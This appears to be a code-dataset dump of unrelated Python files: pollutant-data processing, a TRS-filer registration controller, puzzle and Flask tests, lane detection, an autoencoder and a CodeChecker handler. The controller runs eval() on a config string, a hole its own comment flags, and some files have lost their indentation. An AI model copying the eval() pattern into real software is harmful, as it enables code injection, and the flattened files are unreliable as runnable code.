fnames=list(subprocess.check_output('ls concrec*dat',shell=True).split(b'\n'))
fnames=[i.decode('utf8') for i in fnames if len(i)>0 ]
if len(fnames)==0:sys.exit('concrec not found')
# number of data lines per file (one value per grid cell)
wc=int(subprocess.check_output('cat '+fnames[0]+'|wc -l',shell=True).split(b'\n')[0])
# hour index parsed from the last 4 digits of the file name
jt=[int(fname.split('/')[-1].replace('.dat','')[-4:]) for fname in fnames if len(fname)>0]
# species index parsed from the 2 digits before the hour digits
js=[int(fname.split('/')[-1].replace('.dat','')[-6:-4]) for fname in fnames if len(fname)>0]
df=DataFrame({'hr':jt,'spec':js,'fname':fnames})
df=df.loc[df.spec>0].reset_index(drop=True)
# Read every file's contents into matrix C[species, hour, cell]
C=np.zeros(shape=(max(js)+1,max(jt)+1,wc))
for i in range(len(df)):
    with open(df.loc[i,'fname'],'r') as f:
        tmp=[float(l.strip('\n')) for l in f]
    C[df.loc[i,'spec'],df.loc[i,'hr'],:]=tmp[:]
# Split out the individual pollutant species
# (indices presumably follow CSPEC order: 1=SO4, 3=HNO3, 4=NO3, 5=PMS1 — confirm)
so4 =C[1,:,:]
hno3=C[3,:,:]
no3 =C[4,:,:]
p25 =C[5,:,:]
# Compute the mass of the bound ammonium salts (molar-mass ratios) and
# re-total the particulate mass.
nh4=so4*(36./96.)+no3*(18./62.)+hno3*(18./63.)
total=so4+no3+hno3+nh4+p25
# Write the results: one output file per hour, one value per line.
fnRoot=fnames[0].replace('.dat','')[:-6]+'00'
for it in range(1,max(jt)+1):
    fname=fnRoot+'{:04d}'.format(it)+'.dat'
    with open(fname,'w') as f:
        for ic in range(wc):
            f.write(str(total[it,ic])+'\n')
| StarcoderdataPython |
4837129 | """Controller for registering new objects."""
import logging
import string # noqa: F401
from typing import (Dict, Optional)
from flask import current_app
from pymongo.errors import DuplicateKeyError
from trs_filer.errors.exceptions import (
InternalServerError,
)
from trs_filer.ga4gh.trs.endpoints.utils import (
generate_id,
)
logger = logging.getLogger(__name__)
class RegisterToolClass:
    """Class to register tool classes with the service."""
    def __init__(
        self,
        data: Dict,
        id: Optional[str] = None,
    ) -> None:
        """Initialize tool class data.
        Args:
            data: Tool class metadata consistent with the `ToolClass` schema.
            id: Tool class identifier. Auto-generated if not provided.
        Attributes:
            data: Tool metadata.
            replace: Whether it is allowed to replace an existing tool. Set
                to `True` if an `id` is provided, else set to `False`.
            id_charset: Allowed character set or expression evaluating to
                allowed character set for generating object identifiers.
            id_length: Length of generated object identifiers.
            meta_version_init: Initial value for tool meta version.
            url_prefix: URL scheme of application. For constructing tool and
                version `url` properties.
            host_name: Name of application host. For constructing tool and
                version `url` properties.
            external_port: Port at which application is served. For
                constructing tool and version `url` properties.
            api_path: Base path at which API endpoints can be reached. For
                constructing tool and version `url` properties.
            tool_class_validation: Whether a tool is only allowed to be added
                if it is associated with a pre-existing tool class; if `False`,
                the tool class associated with the tool to be added is inserted
                into the tool class database collection on the fly.
            db_coll_tools: Database collection for storing tool objects.
            db_coll_files: Database collection for storing file objects.
            db_coll_classes: Database collection for storing tool class
                objects.
        """
        conf = current_app.config['FOCA'].endpoints
        self.data = data
        self.data['id'] = None if id is None else id
        self.replace = True
        self.id_charset = conf['tool']['id']['charset']
        self.id_length = int(conf['tool']['id']['length'])
        self.meta_version_init = int(conf['tool']['meta_version']['init'])
        self.url_prefix = conf['service']['url_prefix']
        self.host_name = conf['service']['external_host']
        self.external_port = conf['service']['external_port']
        self.api_path = conf['service']['api_path']
        self.db_coll_classes = (
            current_app.config['FOCA'].db.dbs['trsStore']
            .collections['toolclasses'].client
        )
    def process_metadata(self) -> None:
        """Process tool class metadata."""
        # evaluate character set expression or interpret literal string as set
        # NOTE(review): eval() on a config-supplied string executes arbitrary
        # code; acceptable only if the value always comes from the operator's
        # own configuration, never from request data — confirm.
        try:
            self.id_charset = eval(self.id_charset)
        except Exception:
            self.id_charset = ''.join(sorted(set(self.id_charset)))
    def register_metadata(self) -> None:
        """Register toolClass with TRS.
        Returns:
            ToolClass object.
        """
        self.process_metadata()
        # set unique ID, dependent values and register object
        # Up to 10 attempts to obtain a collision-free identifier.
        i = 0
        while i < 10:
            i += 1
            # set random ID unless ID is provided
            if self.data['id'] is None:
                self.replace = False
                self.data['id'] = generate_id(
                    charset=self.id_charset,
                    length=self.id_length
                )
            if self.replace:
                # replace tool class in database
                result = self.db_coll_classes.replace_one(
                    filter={'id': self.data['id']},
                    replacement=self.data,
                )
                # verify replacement
                # If nothing was modified, fall through and insert instead.
                if result.modified_count:
                    logger.info(
                        f"Replaced tool class with id '{self.data['id']}'."
                    )
                    break
            # insert tool class into database
            try:
                self.db_coll_classes.insert_one(document=self.data)
            except DuplicateKeyError:
                # ID collision: retry with a fresh random identifier.
                continue
            logger.info(f"Added tool class with id '{self.data['id']}'.")
            break
        else:
            # Loop exhausted without a successful insert/replace.
            raise InternalServerError
        logger.debug(
            "Entry in 'toolclasses' collection: "
            f"{self.db_coll_classes.find_one({'id': self.data['id']})}"
        )
| StarcoderdataPython |
12821601 | # coding: utf-8
#
# Copyright (c) 2018, <NAME> <<EMAIL>>. All rights reserved.
# Licensed under BSD 2-Clause License. See LICENSE file for full license.
from pytest import mark
from advent.input import text
from advent.the_stars_align import parser, part1
test_data = """
position=< 9, 1> velocity=< 0, 2>
position=< 7, 0> velocity=<-1, 0>
position=< 3, -2> velocity=<-1, 1>
position=< 6, 10> velocity=<-2, -1>
position=< 2, -4> velocity=< 2, 2>
position=<-6, 10> velocity=< 2, -2>
position=< 1, 8> velocity=< 1, -1>
position=< 1, 7> velocity=< 1, 0>
position=<-3, 11> velocity=< 1, -2>
position=< 7, 6> velocity=<-1, -1>
position=<-2, 3> velocity=< 1, 0>
position=<-4, 3> velocity=< 2, 0>
position=<10, -3> velocity=<-1, 1>
position=< 5, 11> velocity=< 1, -2>
position=< 4, 7> velocity=< 0, -1>
position=< 8, -2> velocity=< 0, 1>
position=<15, 0> velocity=<-2, 0>
position=< 1, 6> velocity=< 1, 0>
position=< 8, 9> velocity=< 0, -1>
position=< 3, 3> velocity=<-1, 1>
position=< 0, 5> velocity=< 0, -1>
position=<-2, 2> velocity=< 2, 0>
position=< 5, -2> velocity=< 1, 2>
position=< 1, 4> velocity=< 2, 1>
position=<-2, 7> velocity=< 2, -2>
position=< 3, 6> velocity=<-1, -1>
position=< 5, 0> velocity=< 1, 0>
position=<-6, 0> velocity=< 2, 0>
position=< 5, 9> velocity=< 1, -2>
position=<14, 7> velocity=<-2, 0>
position=<-3, 6> velocity=< 2, -1>
"""
test_output = """
#...#..###
#...#...#.
#...#...#.
#####...#.
#...#...#.
#...#...#.
#...#...#.
#...#..###
"""
def test_parser():
    """parser() yields ((x, y), (vx, vy)) tuples in input order."""
    test = list(parser(test_data))
    assert test[2] == ((3, -2), (-1, 1))
    assert test[0] == ((9, 1), (0, 2))
def test_part1():
    # part1() returns a 2-tuple; element [1] is presumably the rendered
    # star picture — compared here against the expected ASCII art.
    assert test_output.strip() == part1(test_data)[1].strip()
def test_part2():
    # Named "part2" but exercises part1()[0] — presumably the elapsed
    # seconds, which is the puzzle's part-2 answer.
    assert 3 == part1(test_data)[0]
@mark.slow
def test_part2_with_puzzle_input():
    # Marked slow: runs against the full puzzle input loaded from disk.
    assert 10003 == part1(text("the_stars_align"))[0]
| StarcoderdataPython |
5184455 | import torch, os, cv2
from model.model import parsingNet
from utils.common import merge_config
from utils.dist_utils import dist_print
import torch
import scipy.special, tqdm
import numpy as np
import torchvision.transforms as transforms
from data.dataset import LaneTestDataset
from data.constant import culane_row_anchor, tusimple_row_anchor
from thop import profile, clever_format
import matplotlib.pyplot as plt
if __name__ == "__main__":
torch.backends.cudnn.benchmark = True
args, cfg = merge_config()
dist_print('start testing...')
assert cfg.backbone in ['18','34','50','101','152','50next','101next','50wide','101wide']
if cfg.dataset == 'CULane':
cls_num_per_lane = 18
elif cfg.dataset == 'Tusimple':
cls_num_per_lane = 56
else:
raise NotImplementedError
net = parsingNet(pretrained = False, backbone=cfg.backbone,cls_dim = (cfg.griding_num+1,cls_num_per_lane,4),
use_aux=False).cuda() # we dont need auxiliary segmentation in testing
state_dict = torch.load(cfg.test_model, map_location='cpu')['model']
compatible_state_dict = {}
for k, v in state_dict.items():
if 'module.' in k:
compatible_state_dict[k[7:]] = v
else:
compatible_state_dict[k] = v
net.load_state_dict(compatible_state_dict, strict=False)
net.eval()
input_test = torch.randn(64, 3, 7, 7).cuda()
macs, params, = profile(net.model, inputs=([input_test]), verbose=False)
macs, _ = clever_format([macs, params], "%.3f")
print('MACs: {}'.format(macs))
img_transforms = transforms.Compose([
transforms.Resize((288, 800)),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
])
if cfg.dataset == 'CULane':
splits = ['test0_normal.txt']#, 'test1_crowd.txt', 'test2_hlight.txt', 'test3_shadow.txt', 'test4_noline.txt', 'test5_arrow.txt', 'test6_curve.txt', 'test7_cross.txt', 'test8_night.txt']
datasets = [LaneTestDataset(cfg.data_root,os.path.join(cfg.data_root, 'list/test_split/'+split),img_transform = img_transforms) for split in splits]
img_w, img_h = 1640, 590
row_anchor = culane_row_anchor
elif cfg.dataset == 'Tusimple':
splits = ['test.txt']
datasets = [LaneTestDataset(cfg.data_root,os.path.join(cfg.data_root, split),img_transform = img_transforms) for split in splits]
img_w, img_h = 1280, 720
row_anchor = tusimple_row_anchor
else:
raise NotImplementedError
job_done = True
for split, dataset in zip(splits, datasets):
loader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle = False, num_workers=1)
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
print(split[:-3]+'avi')
vout = cv2.VideoWriter(split[:-3]+'avi', fourcc , 30.0, (img_w, img_h))
for i, data in enumerate(tqdm.tqdm(loader)):
imgs, names = data
#img_h1=imgs.shape[0]
#img_w1=imgs.shape[1]
#imgs = imgs[,:]
#print(imgs)
#imgs = cv2.resize(imgs, (img_w, img_h), interpolation=cv2.INTER_CUBIC)
imgs = imgs.cuda()
with torch.no_grad():
out = net(imgs)
#torch.Size([1, 3, 288, 800])
print("imgs.shape",imgs.shape)
print("color",imgs[0,0,0,0],imgs[0,1,0,0],imgs[0,2,0,0] )
if not job_done :
job_done = True
torch.onnx._export(net, imgs, "./ufast_lane_det.onnx", verbose=False,
input_names=['input'],output_names=['output1'],
opset_version=12, keep_initializers_as_inputs=True, export_params=True,dynamic_axes=None)
col_sample = np.linspace(0, 800 - 1, cfg.griding_num)
col_sample_w = col_sample[1] - col_sample[0]
#4.0150
for k in range(len(out)):
print("out[",k,"].shape",out[k].shape)
out_j = out[0].data.cpu().numpy()
out_j = out_j[:, ::-1, :]
#第二个纬度 倒序
#print("out_j.shape 1",out_j.shape)
#沿着Z 轴 进行softmax ,每个数 乘以 【1~200] 代表着 图像X 定位的位置。
#比如 下标 1 ,数值0.9 ,乘以 1 = X分割区域点 1 的位置概率是 0.9
#下标100 ,数值 0.8,乘以 100 = 分割区域点 100 处,出现概率是 0.8
#车道最终预测结果取最大,类似一个长的山峰,沿着最高点,选择高处的连线
prob = scipy.special.softmax(out_j[:-1, :, :], axis=0)
idx = np.arange(200) + 1
idx = idx.reshape(-1, 1, 1)
loc = np.sum(prob * idx, axis=0)
out_j = np.argmax(out_j, axis=0)
#print("out_j.shape 2",out_j.shape,out_j)
loc[out_j == cfg.griding_num] = 0
out_j = loc
#print("out_j.shape",out_j.shape,loc)
# import pdb; pdb.set_trace()
vis = cv2.imread(os.path.join(cfg.data_root,names[0]))
#out_j (18,4) ,4 条车道,存储x 的位置[0~1],18 是Y 的序号
for i in range(out_j.shape[1]):
#10% 左侧区域开始
if np.sum(out_j[:, i] != 0) > 1:
for k in range(out_j.shape[0]):
if out_j[k, i] > 0:
img_h0 = vis.shape[0]
img_w0 = vis.shape[1]
#print("vis.shape",vis.shape)
scalex = img_w0 / 1640
scaley = img_h0 / 590
ppp = (int(out_j[k, i] * col_sample_w * img_w * scalex/ 800) - 1,
int(img_h * scaley * (row_anchor[cls_num_per_lane-1-k]/288)) - 1 )
#print("write circle",ppp)
cv2.circle(vis,ppp,2,(0,255,0),-1)
vout.write(vis)
cv2.imshow('imshow',vis)
cv2.waitKey(0)
cv2.destroyAllWindows()
vout.release() | StarcoderdataPython |
1767443 | <filename>autoencoder/Q1_Autoencoder.py
import random
import torch
import torch.nn as nn
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
N=1000
mean1=[0,0,0]
cov1=[[1,0.8,0.8],[0.8,1,0.8],[0.8,0.8,1]]
dataset = np.random.multivariate_normal(mean1, cov1, N)
dataset = (dataset-np.amin(dataset))/(np.amax(dataset)-np.amin(dataset))
indices1 = np.random.permutation(dataset.shape[0])
training_idx, test_idx = indices1[:800], indices1[800:]
training_dataset, test_dataset = dataset[training_idx,:], dataset[test_idx,:]
label_train,label_test=dataset[training_idx,:], dataset[test_idx,:]
W11,W12,W13=0.01,0.03,0.05
W21,W22,W23=0.08,0.03,0.1
W0=0.01
W00=0.20
B11,B12=0.001,0.001
B21,B22=0.009,0.001
B31,B32=0.008,0.007
B0=0.001
B00=0.003
B000=0.004
#Initial Learning Rate
lr=0.1
def sigmoidF(X):
return (1/(1+np.exp(-X)))
def sigmoidP(X):
return (sigmoidF(X)*(1-sigmoidF(X)))
DW11=DW12=DW13=DW21=DW22=DW23=DW0=DW00=DB11=DB12=DB21=DB22=DB31=DB32=DB0=DB00=DB000=0.00
train_loss_array=[]
test_loss_array=[]
for epoch in range(200):
y1=[]
y2=[]
y3=[]
for i in range(training_dataset.shape[0]):
X1=training_dataset[i][0]
X2=training_dataset[i][1]
X3=training_dataset[i][2]
a1=(X1*W11)+(X2*W12)+(X3*W13)+W0
Z1=sigmoidF(a1)
a2=(X1*W21)+(X2*W22)+(X3*W23)+W00
Z2=sigmoidF(a2)
a3=(Z1*B11)+(Z2*B12)+B0
a4=(Z1*B21)+(Z2*B22)+B00
a5=(Z1*B31)+(Z2*B32)+B000
Z3=sigmoidF(a3)
Z4=sigmoidF(a4)
Z5=sigmoidF(a5)
y1.append(Z3)
y2.append(Z4)
y3.append(Z5)
DW11=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1)*X1)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1)*X1)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1)*X1)
DW12=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1)*X2)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1)*X2)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1)*X2)
DW13=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1)*X3)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1)*X3)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1)*X3)
DW21=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B12*sigmoidP(a2)*X1)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B22*sigmoidP(a2)*X1)+ (-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B32*sigmoidP(a2)*X1)
DW22=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B12*sigmoidP(a2)*X2)+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B22*sigmoidP(a2)*X2)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B32*sigmoidP(a2)*X2)
DW23=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B12*sigmoidP(a2)*X3)+ (-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B22*sigmoidP(a2)*X3)+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B32*sigmoidP(a2)*X3)
DW0=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a1))+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a1))+(-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a1))
DW00=(-2*(X1-sigmoidF(a3))*sigmoidP(a3)*B11*sigmoidP(a2))+(-2*(X2-sigmoidF(a4))*sigmoidP(a4)*B21*sigmoidP(a2))+ (-2*(X3-sigmoidF(a5))*sigmoidP(a5)*B31*sigmoidP(a2))
DB11=-2*(X1-sigmoidF(a3))*sigmoidP(a3)*Z1
DB12=-2*(X1-sigmoidF(a3))*sigmoidP(a3)*Z2
DB21=-2*(X2-sigmoidF(a4))*sigmoidP(a4)*Z1
DB22=-2*(X2-sigmoidF(a4))*sigmoidP(a4)*Z2
DB31=-2*(X3-sigmoidF(a5))*sigmoidP(a5)*Z1
DB32=-2*(X3-sigmoidF(a5))*sigmoidP(a5)*Z2
DB0=-2*(X1-sigmoidF(a3))*sigmoidP(a3)
DB00=-2*(X2-sigmoidF(a4))*sigmoidP(a4)
DB000=-2*(X3-sigmoidF(a5))*sigmoidP(a5)
W11=W11-(lr*DW11)
W12=W12-(lr*DW12)
W13=W13-(lr*DW13)
W21=W21-(lr*DW21)
W22=W22-(lr*DW22)
W23=W23-(lr*DW23)
W0=W0-(lr*DW0)
W00=W00-(lr*DW00)
B11=B11-(lr*DB11)
B12=B12-(lr*DB12)
B21=B21-(lr*DB21)
B22=B22-(lr*DB22)
B31=B31-(lr*DB31)
B32=B32-(lr*DB32)
B0=B0-(lr*DB0)
B00=B00-(lr*DB00)
B000=B000-(lr*DB000)
diff1=np.square(training_dataset[:,0]-y1)
diff2=np.square(training_dataset[:,1]-y2)
diff3=np.square(training_dataset[:,2]-y3)
diff=(diff1+diff2+diff3)
difftrain=diff.reshape(800,1)
msetrain=np.mean(difftrain)
y11=[]
y22=[]
y33=[]
for i in range(test_dataset.shape[0]):
X1_test=test_dataset[i][0]
X2_test=test_dataset[i][1]
X3_test=test_dataset[i][2]
a1=(X1_test*W11)+(X2_test*W12)+(X3_test*W13)+W0
Z1=sigmoidF(a1)
a2=(X1_test*W21)+(X2_test*W22)+(X3_test*W23)+W00
Z2=sigmoidF(a2)
a3=(Z1*B11)+(Z2*B12)+B0
a4=(Z1*B21)+(Z2*B22)+B00
a5=(Z1*B31)+(Z2*B32)+B000
Z3=sigmoidF(a3)
Z4=sigmoidF(a4)
Z5=sigmoidF(a5)
y11.append(Z3)
y22.append(Z4)
y33.append(Z5)
diff1=np.square(test_dataset[:,0]-y11)
diff2=np.square(test_dataset[:,1]-y22)
diff3=np.square(test_dataset[:,2]-y33)
diff=(diff1+diff2+diff3)
difftest=diff.reshape(200,1)
msetest=np.mean(difftest)
print("Train Loss after Epoch" , epoch,"is : ",msetrain,"Test Loss after Epoch" , epoch,"is : ",msetest)
train_loss_array.append(msetrain)
test_loss_array.append(msetest)
#lr=1/(epoch+1)
y11=[]
y22=[]
y33=[]
for i in range(test_dataset.shape[0]):
X1=test_dataset[i][0]
X2=test_dataset[i][1]
X3=test_dataset[i][2]
a1=(X1*W11)+(X2*W12)+(X3*W13)+W0
Z1=sigmoidF(a1)
a2=(X1*W21)+(X2*W22)+(X3*W23)+W00
Z2=sigmoidF(a2)
a3=(Z1*B11)+(Z2*B12)+B0
a4=(Z1*B21)+(Z2*B22)+B00
a5=(Z1*B31)+(Z2*B32)+B000
Z3=sigmoidF(a3)
Z4=sigmoidF(a4)
Z5=sigmoidF(a5)
y11.append(Z3)
y22.append(Z4)
y33.append(Z5)
diff1=(test_dataset[:,0]-y11)
diff2=(test_dataset[:,1]-y22)
diff3=(test_dataset[:,2]-y33)
diff=np.square(diff1+diff2+diff3)
diff=diff.reshape(200,1)
mse=np.mean(diff)
print("Loss on test set ",mse)
plt.title("Train and Test Loss each Epoch for guassian data without Autograd")
plt.xlabel("Epochs")
plt.ylabel("Train and Test Loss for without Autograd")
for i in range(198):
plt.plot([i,i+2],train_loss_array[i:i+2],linestyle='-',linewidth=1,color='red')
plt.plot([i,i+2],test_loss_array[i:i+2],linestyle='-',linewidth=1,color='blue')
plt.legend(["train_loss_array", "test_loss_array"], loc ="upper right")
plt.savefig("Q1_WA.png")
plt.clf()
| StarcoderdataPython |
3374893 | import pytest
from flask import g, session, url_for, request
from portal.db import get_db
def test_sessions(client, auth):
auth.teacher_login()
# Teachers should see session from mock data on session page
response = client.get('/teacher/sessions')
assert b'180 A' in response.data
# Teachers should be able to delete sessions using a POST request
client.post(
'/teacher/sessions',
data={'id': 1}
)
response = client.get('/teacher/sessions')
# Session 1 should now be deleted and no longer shown
assert b'180 A' not in response.data
# Teachers should not able able to delete sessions they don't own
response = client.post(
'/teacher/sessions',
data={'id': 3}
)
assert b'Something went wrong.' in response.data
def test_make_session(client, auth):
auth.teacher_login()
# On a GET request where session creation is not underway, users should be
# redirected to the courses page
response = client.get('teacher/sessions/create')
assert 'http://localhost/teacher/courses' == response.headers['Location']
# Teachers should be able to begin creating a session via POST request
response = client.post(
'/teacher/sessions/create',
data={'course_id': 1}
)
# Teacher should see a student's name if session creation begins successfully
assert b'<NAME>' in response.data
# Cancel the session creation before next request
client.get('teacher/sessions/cancel')
# Teachers should not be able to create sessions for courses they don't own
client.post(
'/teacher/sessions/create',
data={'course_id': 4}
)
response = client.get('/teacher/courses')
assert b'Something went wrong.' in response.data
def test_session_add(client, auth):
auth.teacher_login()
# Get requests should be redirected away
response = client.get('/teacher/sessions/add')
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Session creation must be underway to add students to the roster for that session
# otherwise the user will simply be redirected away
response = client.post(
'/teacher/sessions/add',
data={'id':2}
)
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Now we begin creating a session
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# Teachers should not be able to add teachers to the roster
client.post(
'/teacher/sessions/add',
data={'id': 3}
)
response = client.get('teacher/sessions/create')
assert b'Something went wrong.' in response.data
# Students may then be added with checkbox interface
response = client.post(
'/teacher/sessions/add',
data={'id':2}
)
# Confirm that session_add redirects to session page after running
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
response = client.get('/teacher/sessions/create')
# Confirm that the roster is not empty
assert b'Remove from Session' in response.data
def test_session_remove(client, auth):
auth.teacher_login()
# Get requests should be redirected away
response = client.get('/teacher/sessions/remove')
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Session creation must be underway to remove students from the roster
# otherwise the user will simply be redirected away
response = client.post(
'/teacher/sessions/remove',
data={'id':2}
)
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Now we begin creating a session
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# Teachers shouldn't be able to attempt to remove invalid users from the table
client.post(
'teacher/sessions/remove',
data={'id':3}
)
response = client.get('/teacher/sessions/create')
assert b'Something went wrong.' in response.data
# Students need to be added before they can be removed
client.post(
'/teacher/sessions/add',
data={'id':2}
)
# The added student can be removed
client.post(
'teacher/sessions/remove',
data={'id':2}
)
response = client.get('/teacher/sessions/create')
# In the test case, the roster for this session should now be empty
assert b'Remove from Session' not in response.data
def test_session_submit(client, auth):
auth.teacher_login()
# If a user tries to use the GET method at the submit URL, they should be
# redirected to the session creation interface
response = client.get('/teacher/sessions/submit')
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
# Session creation must be underway to submit other information to finalize it,
# otherwise the user will simply be redirected away
response = client.post(
'/teacher/sessions/submit',
data={
'session_name': 'A',
'meeting_days': 'MTWThF',
'meeting_place': 'Mellor',
'meeting_time': '12-4:30'
}
)
assert 'http://localhost/teacher/sessions/create' == response.headers['Location']
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# If the user successfully submits the post request, they should be redirected
# to the appropriate page
response = client.post(
'/teacher/sessions/submit',
data={
'session_name': 'A',
'meeting_days': 'MTWThF',
'meeting_place': 'Mellor',
'meeting_time': '12-4:30'
}
)
assert 'http://localhost/teacher/sessions' == response.headers['Location']
# If the user attempts to submit invalid data (excessive text length)
# it should not be sent to the database
# Re-start session creation
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# Post some invalid data
client.post(
'/teacher/sessions/submit',
data={
'session_name': 'A',
'meeting_days': 'MTWThF',
'meeting_place': 'This text is way too long for this field',
'meeting_time': '12-4:30'
}
)
# Get a page that will display the warning that should be flashed
response = client.get('teacher/courses')
assert b'Something went wrong.' in response.data
def test_session_cancel(client, auth):
auth.teacher_login()
# If the user tries to cancel a session when one does not exist, they will be
# redirected away
response = client.get('/teacher/sessions/cancel')
assert 'http://localhost/teacher/home' == response.headers['Location']
# The user begins creation of a session
client.post(
'/teacher/sessions/create',
data={'course_id':1}
)
# The user cancels creation of a session
response = client.get('/teacher/sessions/cancel')
assert 'http://localhost/teacher/home' == response.headers['Location']
# If the user now tries to view the session creation window, they will be
# redirected to the courses page
response = client.get('/teacher/sessions/create')
assert 'http://localhost/teacher/courses' == response.headers['Location']
def test_session_edit(client, auth, app):
auth.teacher_login()
# If the user tries to visit the edit page without an edit in progress,
# They should be redirected to the teacher home view
response = client.get('/teacher/sessions/edit')
assert 'http://localhost/teacher/home' == response.headers['Location']
# The user should be able to begin a new editing session by posting a session code
response = client.post(
'/teacher/sessions/edit',
data={'edit':1}
)
# They should then see the editing page
assert b'Edit a Session' in response.data
# Cancel edit to prepare for next request
client.get('/teacher/sessions/cancel')
# Teachers should not be able to edit sessions they do not own
client.post(
'/teacher/sessions/edit',
data={'edit': 3}
)
response = client.get('teacher/home')
assert b'Something went wrong.' in response.data
def test_edit_mode(client, auth):
auth.teacher_login()
# A user begins editing a post
client.post(
'/teacher/sessions/edit',
data={'edit':1}
)
# Adding and removing from the roster, canceling, and submitting
# should behave differently when an edit is in progress
response = client.get('/teacher/sessions/add')
assert 'http://localhost/teacher/sessions/edit' == response.headers['Location']
response = client.get('/teacher/sessions/remove')
assert 'http://localhost/teacher/sessions/edit' == response.headers['Location']
response = client.get('/teacher/sessions/submit')
assert 'http://localhost/teacher/sessions/edit' == response.headers['Location']
client.get('/teacher/sessions/cancel')
response = client.get('/teacher/home')
assert b'Session edit canceled' in response.data
| StarcoderdataPython |
3434394 | #!/usr/bin/env python
import sys
import numpy as np
from scipy.spatial import distance
from scipy.stats import pearsonr, spearmanr
from itertools import izip
np.random.seed(1337) # for reproducibility
def pos_prob(x, y):
# return sum(np.log(x[y > 0])) / sum(y)
pos_probs = np.log(x[y > 0])
pos_probs = np.nan_to_num(pos_probs)
return sum(pos_probs)
def min_prob(x, y):
""" the minimum probability of those fields, that should have
been > .5 """
return min(x[y > 0])
def max_prob(x, y):
""" maximum of those that should be zero """
return max(x[y < 1])
def all_prob(x, y):
# return sum(np.log(x[y > 0])) / sum(y)
pos_probs = np.log(x[y > 0])
pos_probs[np.isnan(pos_probs)] = 0
# pos_probs = np.nan_to_num(pos_probs)
neg_probs = np.log(1 - x[y < 1])
neg_probs[np.isnan(neg_probs)] = 0
# neg_probs = np.nan_to_num(neg_probs)
return sum(pos_probs) + sum(neg_probs)
def count_correct(x, y):
return sum((x > .5) == y) / sum(y)
# def print_score(probs, dist_func, name):
# dist = [dist_func(a, b) for a, b in izip(probs, self.Y_eval)]
# print(dist[0], self.scores[0], dist[1100],
# self.scores[1100], dist[-1], self.scores[-1])
# pearson, p = pearsonr(self.scores, dist)
# spearman, p = spearmanr(self.scores, dist)
# print ("[%s]\tP: %f\tS: %f\tSum: %f" %
# (name, pearson, spearman, sum(dist)))
# self.history[name].append((pearson, spearman, sum(dist)))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('pred', help='predictions npz',
type=argparse.FileType('r'))
args = parser.parse_args()
npzfile = np.load(args.pred)
# X=self.X_eval, Y=self.Y_eval, predicted=probs)
X = npzfile['X']
Y = npzfile['Y']
pred = npzfile['predicted']
assert pred.shape == Y.shape
dist_func = distance.cosine
dist = [dist_func(a, b) for a, b in izip(pred, Y)]
for d in dist:
print d
| StarcoderdataPython |
5086998 | # -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Handle Thrift requests for configuration.
"""
import codechecker_api_shared
from codechecker_common.logger import get_logger
from codechecker_server.profiler import timeit
from codechecker_web.shared import convert
from ..database.config_db_model import Configuration
from ..database.database import DBSession
LOG = get_logger('server')
class ThriftConfigHandler:
"""
Manages Thrift requests regarding configuration.
"""
def __init__(self, auth_session, config_session):
self.__auth_session = auth_session
self.__session = config_session
def __require_supermission(self):
"""
Checks if the current user isn't a SUPERUSER.
"""
if (not (self.__auth_session is None) and
not self.__auth_session.is_root):
raise codechecker_api_shared.ttypes.RequestFailed(
codechecker_api_shared.ttypes.ErrorCode.UNAUTHORIZED,
"You are not authorized to modify the notification.")
return True
@timeit
def getNotificationBannerText(self):
"""
Retrieves the notification banner text.
"""
notificationString = ''
with DBSession(self.__session) as session:
notificationQuery = session.query(Configuration) \
.filter(
Configuration.config_key == 'notification_banner_text') \
.one_or_none()
if notificationQuery is not None:
notificationString = notificationQuery.config_value
return convert.to_b64(notificationString)
@timeit
def setNotificationBannerText(self, notification_b64):
"""
Sets the notification banner remove_products_except.
Bevare: This method only works if the use is a SUPERUSER.
"""
self.__require_supermission()
notification = convert.from_b64(notification_b64)
with DBSession(self.__session) as session:
notificationQuery = session.query(Configuration) \
.filter(
Configuration.config_key == 'notification_banner_text') \
.one_or_none()
if notificationQuery is None:
conf = Configuration('notification_banner_text', notification)
session.add(conf)
session.flush()
else:
# update it
notificationQuery.config_value = notification
session.commit()
session.close()
| StarcoderdataPython |
